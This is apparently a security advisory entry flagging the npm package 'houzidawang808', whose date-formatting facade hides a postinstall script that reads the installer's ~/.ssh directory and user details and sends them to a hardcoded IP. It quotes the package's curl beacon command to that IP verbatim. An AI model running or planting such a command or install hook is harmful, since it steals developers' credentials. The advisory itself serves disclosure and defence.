Vulnerability
Malicious code in houzidawang808 (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654) The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script `curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)` that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence